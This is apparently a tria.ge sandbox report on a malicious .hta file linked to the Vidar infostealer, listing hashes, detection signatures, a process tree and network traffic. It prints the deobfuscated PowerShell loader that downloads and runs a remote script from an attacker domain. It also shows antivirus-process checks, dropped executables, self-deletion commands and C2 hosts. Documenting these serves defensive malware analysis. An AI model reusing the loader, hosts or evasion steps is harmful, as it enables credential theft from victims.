Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

23/12/2024, 13:11 UTC

241223-qe4yfszrgj 10

23/12/2024, 12:31 UTC

241223-pqanbazjcs 10

Analysis

  • max time kernel
    93s
  • max time network
    160s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23/12/2024, 13:11 UTC

General

  • Target

    .hta

  • Size

    722B

  • MD5

    4f2067f591d1db46908f42c461b43bc8

  • SHA1

    dbb6c2be0345648645105f5f8646662e319a01ba

  • SHA256

    edebb1c19818a5dc2f09d95f6852c328e9427bc460c3517b543cdf101fba7d84

  • SHA512

    5fde4eea4445de8ac73e510c43475b025d12d8f4e9c71e230d7b99a49efc8c6fa381bcda09295c26afb294bd67cf0a63c20f538dd3b66b702ca9f1ac75bf1c9a

Malware Config

Extracted

Language
ps1
Deobfuscated
1
&{$u = "https://polovoiinspektor.shop/secure/login.txt", $c = (invoke-webrequest -uri $u -usebasicparsing).content, $b = [scriptblock]::create($c), &$b}
2
URLs
exe.dropper

https://polovoiinspektor.shop/secure/login.txt

Signatures

  • Detect Vidar Stealer 4 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Powershell Invoke Web Request.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 51 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4528
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& {$U=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly9wb2xvdm9paW5zcGVrdG9yLnNob3Avc2VjdXJlL2xvZ2luLnR4dA=='));$C=(Invoke-WebRequest -Uri $U -UseBasicParsing).Content;$B=[scriptblock]::Create($C);&$B}"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2268
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\obnnmmot\obnnmmot.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1936
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB016.tmp" "c:\Users\Admin\AppData\Local\Temp\obnnmmot\CSC8DF14D57E40E4CD59F40DFE961FA71E.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2780
      • C:\Users\Admin\AppData\Local\Temp\drtg4eyr.uj3.exe
        "C:\Users\Admin\AppData\Local\Temp\drtg4eyr.uj3.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1656
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c move Forth Forth.cmd & Forth.cmd
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3132
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist
            5⤵
            • Enumerates processes with tasklist
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:1100
          • C:\Windows\SysWOW64\findstr.exe
            findstr /I "opssvc wrsa"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3988
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist
            5⤵
            • Enumerates processes with tasklist
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:4088
          • C:\Windows\SysWOW64\findstr.exe
            findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4700
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c md 623615
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4280
          • C:\Windows\SysWOW64\extrac32.exe
            extrac32 /Y /E Distances
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4064
          • C:\Windows\SysWOW64\findstr.exe
            findstr /V "Duck" Ix
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2484
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c copy /b ..\Loud + ..\Kenny + ..\Advisor + ..\Promotes f
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3248
          • C:\Users\Admin\AppData\Local\Temp\623615\Wb.com
            Wb.com f
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:1392
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\623615\Wb.com" & rd /s /q "C:\ProgramData\KNG4E3OZMOZU" & exit
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4032
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 10
                7⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:4236
          • C:\Windows\SysWOW64\choice.exe
            choice /d y /t 5
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4336

Network

  • flag-us
    DNS
    97.17.167.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    97.17.167.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    17.160.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    17.160.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    polovoiinspektor.shop
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    polovoiinspektor.shop
    IN A
    Response
    polovoiinspektor.shop
    IN A
    185.121.235.167
  • flag-us
    GET
    https://polovoiinspektor.shop/secure/login.txt
    powershell.exe
    Remote address:
    185.121.235.167:443
    Request
    GET /secure/login.txt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
    Host: polovoiinspektor.shop
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.26.2
    Date: Mon, 23 Dec 2024 13:11:44 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 1264
    Last-Modified: Mon, 23 Dec 2024 12:47:49 GMT
    Connection: keep-alive
    ETag: "67695bf5-4f0"
    Accept-Ranges: bytes
  • flag-us
    DNS
    raw.githubusercontent.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    raw.githubusercontent.com
    IN A
    Response
    raw.githubusercontent.com
    IN A
    185.199.109.133
    raw.githubusercontent.com
    IN A
    185.199.108.133
    raw.githubusercontent.com
    IN A
    185.199.111.133
    raw.githubusercontent.com
    IN A
    185.199.110.133
  • flag-us
    GET
    https://raw.githubusercontent.com/MOGEEK02/supreme-octo-palm-tree/refs/heads/main/ChoForgot.exe
    powershell.exe
    Remote address:
    185.199.109.133:443
    Request
    GET /MOGEEK02/supreme-octo-palm-tree/refs/heads/main/ChoForgot.exe HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Connection: keep-alive
    Content-Length: 1111393
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: application/octet-stream
    ETag: "6034a3e23f5d37f82b6b551e606b7b7b2df095f09fa1b3f56cc84a496c13bbca"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: 0AB4:1B4DCA:69545B:8C8DE5:67696097
    Accept-Ranges: bytes
    Date: Mon, 23 Dec 2024 13:11:44 GMT
    Via: 1.1 varnish
    X-Served-By: cache-lcy-eglc8600022-LCY
    X-Cache: HIT
    X-Cache-Hits: 0
    X-Timer: S1734959505.673626,VS0,VE1
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: 699da9a7a7847778c0d08b743061d229c7486d18
    Expires: Mon, 23 Dec 2024 13:16:44 GMT
    Source-Age: 249
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    167.235.121.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    167.235.121.185.in-addr.arpa
    IN PTR
    Response
    167.235.121.185.in-addr.arpa
    IN PTR
    v200070hosted-by-vdsinacom
  • flag-us
    DNS
    133.109.199.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.109.199.185.in-addr.arpa
    IN PTR
    Response
    133.109.199.185.in-addr.arpa
    IN PTR
    cdn-185-199-109-133githubcom
  • flag-us
    DNS
    ifconfig.me
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    ifconfig.me
    IN A
    Response
    ifconfig.me
    IN A
    34.160.111.145
  • flag-us
    GET
    https://ifconfig.me/ip
    powershell.exe
    Remote address:
    34.160.111.145:443
    Request
    GET /ip HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
    Host: ifconfig.me
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    date: Mon, 23 Dec 2024 13:11:46 GMT
    content-type: text/plain
    Content-Length: 14
    access-control-allow-origin: *
    via: 1.1 google
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-us
    DNS
    145.111.160.34.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    145.111.160.34.in-addr.arpa
    IN PTR
    Response
    145.111.160.34.in-addr.arpa
    IN PTR
    14511116034bcgoogleusercontentcom
  • flag-us
    DNS
    saaadnesss.shop
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    saaadnesss.shop
    IN A
    Response
    saaadnesss.shop
    IN A
    185.121.235.167
  • flag-us
    POST
    https://saaadnesss.shop/connect
    powershell.exe
    Remote address:
    185.121.235.167:443
    Request
    POST /connect HTTP/1.1
    Content-Type: application/json
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
    Host: saaadnesss.shop
    Content-Length: 33
    Connection: Keep-Alive
    Response
    HTTP/1.1 200
    Server: nginx/1.26.2
    Date: Mon, 23 Dec 2024 13:11:48 GMT
    Content-Type: application/json
    Content-Length: 20
    Connection: keep-alive
    vary: Origin
  • flag-us
    DNS
    jwpLqUxchOHCiOIbIyqhmtbx.jwpLqUxchOHCiOIbIyqhmtbx
    Wb.com
    Remote address:
    8.8.8.8:53
    Request
    jwpLqUxchOHCiOIbIyqhmtbx.jwpLqUxchOHCiOIbIyqhmtbx
    IN A
    Response
  • flag-us
    DNS
    209.205.72.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.205.72.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    t.me
    Wb.com
    Remote address:
    8.8.8.8:53
    Request
    t.me
    IN A
    Response
    t.me
    IN A
    149.154.167.99
  • flag-nl
    GET
    https://t.me/k04ael
    Wb.com
    Remote address:
    149.154.167.99:443
    Request
    GET /k04ael HTTP/1.1
    Host: t.me
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Mon, 23 Dec 2024 13:12:04 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 12298
    Connection: keep-alive
    Set-Cookie: stel_ssid=cf4f49f67854273cc9_9565173306734016076; expires=Tue, 24 Dec 2024 13:12:04 GMT; path=/; samesite=None; secure; HttpOnly
    Pragma: no-cache
    Cache-control: no-store
    X-Frame-Options: ALLOW-FROM https://web.telegram.org
    Content-Security-Policy: frame-ancestors https://web.telegram.org
    Strict-Transport-Security: max-age=35768000
  • flag-us
    DNS
    bijutr.shop
    Wb.com
    Remote address:
    8.8.8.8:53
    Request
    bijutr.shop
    IN A
    Response
    bijutr.shop
    IN A
    188.245.216.205
  • flag-de
    GET
    https://bijutr.shop/
    Wb.com
    Remote address:
    188.245.216.205:443
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: bijutr.shop
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 23 Dec 2024 13:12:05 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-us
    DNS
    99.167.154.149.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    99.167.154.149.in-addr.arpa
    IN PTR
    Response
  • flag-de
    POST
    https://bijutr.shop/
    Wb.com
    Remote address:
    188.245.216.205:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----HLX4EUSR1N7QQIMGVASR
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: bijutr.shop
    Content-Length: 256
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 23 Dec 2024 13:12:05 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://bijutr.shop/
    Wb.com
    Remote address:
    188.245.216.205:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----9HVSRQ90HDJM7QIW4OHD
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: bijutr.shop
    Content-Length: 299
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 23 Dec 2024 13:12:06 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-us
    DNS
    e5.o.lencr.org
    Wb.com
    Remote address:
    8.8.8.8:53
    Request
    e5.o.lencr.org
    IN A
    Response
    e5.o.lencr.org
    IN CNAME
    o.lencr.edgesuite.net
    o.lencr.edgesuite.net
    IN CNAME
    a1887.dscq.akamai.net
    a1887.dscq.akamai.net
    IN A
    92.123.77.34
    a1887.dscq.akamai.net
    IN A
    92.123.77.67
  • flag-nl
    GET
    http://e5.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQeEcDJrP2kU%2B9LL2pzIRVgTVStuQQUmc0pw6FYJq96ekyEWo9ziGCw394CEgNwz8PXImKfnhVNHh00GVNPyQ%3D%3D
    Wb.com
    Remote address:
    92.123.77.34:80
    Request
    GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBQeEcDJrP2kU%2B9LL2pzIRVgTVStuQQUmc0pw6FYJq96ekyEWo9ziGCw394CEgNwz8PXImKfnhVNHh00GVNPyQ%3D%3D HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: e5.o.lencr.org
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Content-Type: application/ocsp-response
    Content-Length: 345
    ETag: "925107482F0B720C871FA7FEB51669ACDE93F83B32EB860D03676CBAF4B83E3B"
    Last-Modified: Mon, 23 Dec 2024 08:54:00 UTC
    Cache-Control: public, no-transform, must-revalidate, max-age=6141
    Expires: Mon, 23 Dec 2024 14:54:27 GMT
    Date: Mon, 23 Dec 2024 13:12:06 GMT
    Connection: keep-alive
  • flag-de
    POST
    https://bijutr.shop/
    Wb.com
    Remote address:
    188.245.216.205:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----H47YMGLX4OZM7YC2NOZM
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: bijutr.shop
    Content-Length: 299
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 23 Dec 2024 13:12:06 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-us
    DNS
    205.216.245.188.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    205.216.245.188.in-addr.arpa
    IN PTR
    Response
    205.216.245.188.in-addr.arpa
    IN PTR
    static205216245188clients your-serverde
  • flag-us
    DNS
    168.245.100.95.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    168.245.100.95.in-addr.arpa
    IN PTR
    Response
    168.245.100.95.in-addr.arpa
    IN PTR
    a95-100-245-168deploystaticakamaitechnologiescom
  • flag-us
    DNS
    34.77.123.92.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    34.77.123.92.in-addr.arpa
    IN PTR
    Response
    34.77.123.92.in-addr.arpa
    IN PTR
    a92-123-77-34deploystaticakamaitechnologiescom
  • flag-de
    POST
    https://bijutr.shop/
    Wb.com
    Remote address:
    188.245.216.205:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----US0HDTJW4EU3E37900ZU
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: bijutr.shop
    Content-Length: 300
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 23 Dec 2024 13:12:07 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://bijutr.shop/
    Wb.com
    Remote address:
    188.245.216.205:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----OP8QIECJ5XBIM7Y5XBAI
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: bijutr.shop
    Content-Length: 299
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 23 Dec 2024 13:12:07 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://bijutr.shop/
    Wb.com
    Remote address:
    188.245.216.205:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----US0HDTJW4EU3E37900ZU
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: bijutr.shop
    Content-Length: 299
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 23 Dec 2024 13:12:08 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://bijutr.shop/
    Wb.com
    Remote address:
    188.245.216.205:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----S26PZCJEC2V37YCBAIMG
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: bijutr.shop
    Content-Length: 299
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 23 Dec 2024 13:12:08 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-us
    DNS
    197.87.175.4.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    197.87.175.4.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    206.23.85.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    206.23.85.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    72.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    72.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.214.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.214.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    48.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    48.229.111.52.in-addr.arpa
    IN PTR
    Response
  • 185.121.235.167:443
    https://polovoiinspektor.shop/secure/login.txt
    tls, http
    powershell.exe
    843 B
    4.3kB
    8
    6

    HTTP Request

    GET https://polovoiinspektor.shop/secure/login.txt

    HTTP Response

    200
  • 185.199.109.133:443
    https://raw.githubusercontent.com/MOGEEK02/supreme-octo-palm-tree/refs/heads/main/ChoForgot.exe
    tls, http
    powershell.exe
    21.7kB
    1.2MB
    455
    838

    HTTP Request

    GET https://raw.githubusercontent.com/MOGEEK02/supreme-octo-palm-tree/refs/heads/main/ChoForgot.exe

    HTTP Response

    200
  • 34.160.111.145:443
    https://ifconfig.me/ip
    tls, http
    powershell.exe
    809 B
    4.0kB
    8
    8

    HTTP Request

    GET https://ifconfig.me/ip

    HTTP Response

    200
  • 185.121.235.167:443
    https://saaadnesss.shop/connect
    tls, http
    powershell.exe
    977 B
    3.1kB
    9
    6

    HTTP Request

    POST https://saaadnesss.shop/connect

    HTTP Response

    200
  • 149.154.167.99:443
    https://t.me/k04ael
    tls, http
    Wb.com
    1.5kB
    19.4kB
    24
    20

    HTTP Request

    GET https://t.me/k04ael

    HTTP Response

    200
  • 188.245.216.205:443
    https://bijutr.shop/
    tls, http
    Wb.com
    1.0kB
    3.0kB
    11
    8

    HTTP Request

    GET https://bijutr.shop/

    HTTP Response

    200
  • 188.245.216.205:443
    https://bijutr.shop/
    tls, http
    Wb.com
    1.4kB
    565 B
    9
    6

    HTTP Request

    POST https://bijutr.shop/

    HTTP Response

    200
  • 188.245.216.205:443
    https://bijutr.shop/
    tls, http
    Wb.com
    1.5kB
    598 B
    9
    7

    HTTP Request

    POST https://bijutr.shop/

    HTTP Response

    200
  • 92.123.77.34:80
    http://e5.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQeEcDJrP2kU%2B9LL2pzIRVgTVStuQQUmc0pw6FYJq96ekyEWo9ziGCw394CEgNwz8PXImKfnhVNHh00GVNPyQ%3D%3D
    http
    Wb.com
    467 B
    862 B
    5
    3

    HTTP Request

    GET http://e5.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQeEcDJrP2kU%2B9LL2pzIRVgTVStuQQUmc0pw6FYJq96ekyEWo9ziGCw394CEgNwz8PXImKfnhVNHh00GVNPyQ%3D%3D

    HTTP Response

    200
  • 188.245.216.205:443
    https://bijutr.shop/
    tls, http
    Wb.com
    1.5kB
    558 B
    9
    6

    HTTP Request

    POST https://bijutr.shop/

    HTTP Response

    200
  • 188.245.216.205:443
    https://bijutr.shop/
    tls, http
    Wb.com
    1.5kB
    558 B
    9
    6

    HTTP Request

    POST https://bijutr.shop/

    HTTP Response

    200
  • 188.245.216.205:443
    https://bijutr.shop/
    tls, http
    Wb.com
    1.5kB
    558 B
    9
    6

    HTTP Request

    POST https://bijutr.shop/

    HTTP Response

    200
  • 188.245.216.205:443
    https://bijutr.shop/
    tls, http
    Wb.com
    1.4kB
    518 B
    8
    5

    HTTP Request

    POST https://bijutr.shop/

    HTTP Response

    200
  • 188.245.216.205:443
    https://bijutr.shop/
    tls, http
    Wb.com
    1.4kB
    518 B
    8
    5

    HTTP Request

    POST https://bijutr.shop/

    HTTP Response

    200
  • 8.8.8.8:53
    97.17.167.52.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    97.17.167.52.in-addr.arpa

  • 8.8.8.8:53
    17.160.190.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    17.160.190.20.in-addr.arpa

  • 8.8.8.8:53
    polovoiinspektor.shop
    dns
    powershell.exe
    67 B
    83 B
    1
    1

    DNS Request

    polovoiinspektor.shop

    DNS Response

    185.121.235.167

  • 8.8.8.8:53
    raw.githubusercontent.com
    dns
    powershell.exe
    71 B
    135 B
    1
    1

    DNS Request

    raw.githubusercontent.com

    DNS Response

    185.199.109.133
    185.199.108.133
    185.199.111.133
    185.199.110.133

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    167.235.121.185.in-addr.arpa
    dns
    74 B
    116 B
    1
    1

    DNS Request

    167.235.121.185.in-addr.arpa

  • 8.8.8.8:53
    133.109.199.185.in-addr.arpa
    dns
    74 B
    118 B
    1
    1

    DNS Request

    133.109.199.185.in-addr.arpa

  • 8.8.8.8:53
    ifconfig.me
    dns
    powershell.exe
    57 B
    73 B
    1
    1

    DNS Request

    ifconfig.me

    DNS Response

    34.160.111.145

  • 8.8.8.8:53
    145.111.160.34.in-addr.arpa
    dns
    73 B
    126 B
    1
    1

    DNS Request

    145.111.160.34.in-addr.arpa

  • 8.8.8.8:53
    saaadnesss.shop
    dns
    powershell.exe
    61 B
    77 B
    1
    1

    DNS Request

    saaadnesss.shop

    DNS Response

    185.121.235.167

  • 8.8.8.8:53
    jwpLqUxchOHCiOIbIyqhmtbx.jwpLqUxchOHCiOIbIyqhmtbx
    dns
    Wb.com
    95 B
    170 B
    1
    1

    DNS Request

    jwpLqUxchOHCiOIbIyqhmtbx.jwpLqUxchOHCiOIbIyqhmtbx

  • 8.8.8.8:53
    209.205.72.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    209.205.72.20.in-addr.arpa

  • 8.8.8.8:53
    t.me
    dns
    Wb.com
    50 B
    66 B
    1
    1

    DNS Request

    t.me

    DNS Response

    149.154.167.99

  • 8.8.8.8:53
    bijutr.shop
    dns
    Wb.com
    57 B
    73 B
    1
    1

    DNS Request

    bijutr.shop

    DNS Response

    188.245.216.205

  • 8.8.8.8:53
    99.167.154.149.in-addr.arpa
    dns
    73 B
    166 B
    1
    1

    DNS Request

    99.167.154.149.in-addr.arpa

  • 8.8.8.8:53
    e5.o.lencr.org
    dns
    Wb.com
    60 B
    159 B
    1
    1

    DNS Request

    e5.o.lencr.org

    DNS Response

    92.123.77.34
    92.123.77.67

  • 8.8.8.8:53
    205.216.245.188.in-addr.arpa
    dns
    74 B
    133 B
    1
    1

    DNS Request

    205.216.245.188.in-addr.arpa

  • 8.8.8.8:53
    168.245.100.95.in-addr.arpa
    dns
    73 B
    139 B
    1
    1

    DNS Request

    168.245.100.95.in-addr.arpa

  • 8.8.8.8:53
    34.77.123.92.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

